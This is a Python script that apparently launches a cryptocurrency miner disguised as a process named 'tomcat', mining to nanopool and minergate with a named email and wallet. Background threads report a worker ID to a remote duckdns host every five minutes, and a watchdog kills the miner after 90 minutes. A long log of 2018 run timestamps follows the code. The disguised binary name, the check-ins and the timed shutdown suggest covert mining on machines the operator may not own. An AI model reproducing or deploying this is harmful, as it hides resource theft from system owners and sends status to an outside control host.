import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:36:06.838394
#2018-02-17 17:24:07.154222
#2018-02-17 19:13:06.031868
#2018-02-17 21:01:04.143937
#2018-02-17 22:46:03.628323
#2018-02-18 00:29:06.023252
#2018-02-18 02:20:09.184808
#2018-02-18 04:07:02.138484
#2018-02-18 05:56:05.893260
#2018-02-18 07:46:06.234736
#2018-02-18 09:34:05.111201
#2018-02-18 11:20:04.669730
#2018-02-18 13:06:05.803155
#2018-02-18 14:55:01.626990
#2018-02-18 16:42:05.356806
#2018-02-18 18:31:04.057553
#2018-02-18 20:19:04.740223
#2018-02-18 22:04:02.079651
#2018-02-18 23:53:06.964457
#2018-02-19 01:40:06.696572
#2018-02-19 03:28:06.256892
#2018-02-19 05:13:01.670523
#2018-02-19 06:58:05.934117
#2018-02-19 08:46:04.217938
#2018-02-19 10:38:08.717596
#2018-02-19 12:25:10.016142
#2018-02-19 14:12:04.825204
#2018-02-19 16:01:08.380053
#2018-02-19 17:50:09.936368
#2018-02-19 19:37:08.219936
#2018-02-19 21:25:05.923556
#2018-02-19 23:10:08.721014
#2018-02-20 00:55:05.791729
#2018-02-20 02:44:04.148678
#2018-02-20 04:33:02.154731
#2018-02-20 06:17:07.216115
#2018-02-20 08:02:05.524692
#2018-02-20 09:47:07.822836
#2018-02-20 11:31:08.667877
#2018-02-20 13:17:08.208163
#2018-02-20 15:03:04.858594
#2018-02-20 16:47:15.503185
#2018-02-20 18:34:05.295156
#2018-02-20 20:24:02.147538
#2018-02-20 22:10:03.087509
#2018-02-20 23:52:04.394665
#2018-02-21 01:38:04.969583
#2018-02-21 03:27:06.772146
#2018-02-21 05:15:05.346503
#2018-02-21 07:04:04.554732
#2018-02-21 08:49:06.027464
#2018-02-21 10:37:07.825337
#2018-02-21 12:25:09.022882
#2018-02-21 14:12:01.795217
#2018-02-21 15:58:10.614652
#2018-02-21 17:49:09.780780
#2018-02-21 19:35:09.956551
#2018-02-21 21:22:07.263986
#2018-02-21 23:08:02.948772
#2018-02-22 00:56:01.218096
#2018-02-22 02:42:05.295432
#2018-02-22 04:28:05.153617
#2018-02-22 06:14:07.527136
#2018-02-22 08:01:02.047235
#2018-02-22 09:49:03.611413
#2018-02-22 11:33:05.196681
#2018-02-22 13:20:01.298352
#2018-02-22 15:08:05.145551
#2018-02-22 16:51:13.017446
#2018-02-22 18:39:03.485610
#2018-02-22 20:32:05.078780
#2018-02-22 22:19:03.708777
#2018-02-23 00:05:09.978965
#2018-02-23 01:53:05.811536
#2018-02-23 03:42:02.012120
#2018-02-23 05:26:03.402591
#2018-02-23 07:12:07.852156
#2018-02-23 09:17:06.468388
#2018-02-23 11:22:07.263621
#2018-02-23 13:14:05.705998
#2018-02-23 14:59:04.808264
#2018-02-23 16:47:05.773367
#2018-02-23 18:32:08.678202
#2018-02-23 20:21:04.390886
#2018-02-23 22:08:05.155700
#2018-02-23 23:57:06.037428
#2018-02-24 01:46:06.355924
#2018-02-24 03:40:09.665866
#2018-02-24 05:23:04.889011
#2018-02-24 07:11:05.416487
#2018-02-24 09:00:06.702873
#2018-02-24 10:41:06.514078
#2018-02-24 12:33:03.718456
#2018-02-24 14:21:04.309694
#2018-02-24 16:08:02.158126
#2018-02-24 17:59:03.982647
#2018-02-24 19:47:01.397868
#2018-02-24 21:32:01.865223
#2018-02-25 00:18:01.826735
#2018-02-25 04:20:08.496532
#2018-02-25 07:10:03.573739
#2018-02-25 11:39:06.676028
#2018-02-25 13:58:02.032793
#2018-02-25 15:33:01.975165